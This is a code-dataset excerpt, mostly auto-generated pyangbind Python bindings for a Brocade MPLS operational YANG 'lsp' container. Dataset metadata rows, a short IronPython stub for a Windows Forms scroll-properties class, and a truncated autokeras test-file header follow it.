t = YANGDynClass(v,base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_path must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__secondary_path = t
if hasattr(self, '_set'):
self._set()
  def _unset_secondary_path(self):
    """Reset the secondary-path list to a fresh, empty YANG list binding.

    Auto-generated by pyangbind: rebuilding the YANGDynClass (rather than
    clearing the existing one) restores all metadata/extensions defaults.
    """
    self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
lsp_name = __builtin__.property(_get_lsp_name)
lsp_type = __builtin__.property(_get_lsp_type)
bypass_lsp_type = __builtin__.property(_get_bypass_lsp_type)
interface = __builtin__.property(_get_interface)
history = __builtin__.property(_get_history)
basic = __builtin__.property(_get_basic)
forwarding = __builtin__.property(_get_forwarding)
frr = __builtin__.property(_get_frr)
backup = __builtin__.property(_get_backup)
instances = __builtin__.property(_get_instances)
secondary_path = __builtin__.property(_get_secondary_path)
_pyangbind_elements = {'lsp_name': lsp_name, 'lsp_type': lsp_type, 'bypass_lsp_type': bypass_lsp_type, 'interface': interface, 'history': history, 'basic': basic, 'forwarding': forwarding, 'frr': frr, 'backup': backup, 'instances': instances, 'secondary_path': secondary_path, }
| 71.775472 | 784 | 0.72761 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import basic
import forwarding
import frr
import backup
import instances
import secondary_path
class lsp(PybindBase):
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_name','__lsp_type','__bypass_lsp_type','__interface','__history','__basic','__forwarding','__frr','__backup','__instances','__secondary_path',)
_yang_name = 'lsp'
_rest_name = 'lsp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'lsp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'lsp']
def _get_lsp_name(self):
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_lsp_type(self):
return self.__lsp_type
def _set_lsp_type(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_type must be of a type compatible with lsp-type""",
'defined-type': "brocade-mpls-operational:lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)""",
})
self.__lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_type(self):
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
def _get_bypass_lsp_type(self):
return self.__bypass_lsp_type
def _set_bypass_lsp_type(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_type must be of a type compatible with bypass-lsp-type""",
'defined-type': "brocade-mpls-operational:bypass-lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)""",
})
self.__bypass_lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_type(self):
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
def _get_interface(self):
return self.__interface
def _set_interface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_history(self):
return self.__history
def _set_history(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """history must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__history = t
if hasattr(self, '_set'):
self._set()
def _unset_history(self):
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_basic(self):
return self.__basic
def _set_basic(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """basic must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__basic = t
if hasattr(self, '_set'):
self._set()
def _unset_basic(self):
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_forwarding(self):
return self.__forwarding
def _set_forwarding(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """forwarding must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__forwarding = t
if hasattr(self, '_set'):
self._set()
def _unset_forwarding(self):
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_frr(self):
return self.__frr
def _set_frr(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__frr = t
if hasattr(self, '_set'):
self._set()
def _unset_frr(self):
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_backup(self):
return self.__backup
def _set_backup(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """backup must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__backup = t
if hasattr(self, '_set'):
self._set()
def _unset_backup(self):
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_instances(self):
return self.__instances
def _set_instances(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instances must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__instances = t
if hasattr(self, '_set'):
self._set()
def _unset_instances(self):
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_secondary_path(self):
return self.__secondary_path
def _set_secondary_path(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_path must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__secondary_path = t
if hasattr(self, '_set'):
self._set()
def _unset_secondary_path(self):
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
lsp_name = __builtin__.property(_get_lsp_name)
lsp_type = __builtin__.property(_get_lsp_type)
bypass_lsp_type = __builtin__.property(_get_bypass_lsp_type)
interface = __builtin__.property(_get_interface)
history = __builtin__.property(_get_history)
basic = __builtin__.property(_get_basic)
forwarding = __builtin__.property(_get_forwarding)
frr = __builtin__.property(_get_frr)
backup = __builtin__.property(_get_backup)
instances = __builtin__.property(_get_instances)
secondary_path = __builtin__.property(_get_secondary_path)
_pyangbind_elements = {'lsp_name': lsp_name, 'lsp_type': lsp_type, 'bypass_lsp_type': bypass_lsp_type, 'interface': interface, 'history': history, 'basic': basic, 'forwarding': forwarding, 'frr': frr, 'backup': backup, 'instances': instances, 'secondary_path': secondary_path, }
| true | true |
f72ef7eb0ddb67009fc21687759d869de7d0b79e | 456 | py | Python | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class HScrollProperties(ScrollProperties):
"""
Provides basic properties for the System.Windows.Forms.HScrollBar
HScrollProperties(container: ScrollableControl)
"""
@staticmethod
def __new__(self,container):
""" __new__(cls: type,container: ScrollableControl) """
pass
ParentControl=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the control to which this scroll information applies.
"""
| 26.823529 | 85 | 0.72807 | class HScrollProperties(ScrollProperties):
""" __new__(cls: type,container: ScrollableControl) """
pass
"""Gets the control to which this scroll information applies.
| true | true |
f72ef7f4af6964877bdcb43c3b93166aefe758c0 | 1,273 | py | Python | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
] | 1 | 2018-08-06T03:57:51.000Z | 2018-08-06T03:57:51.000Z | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
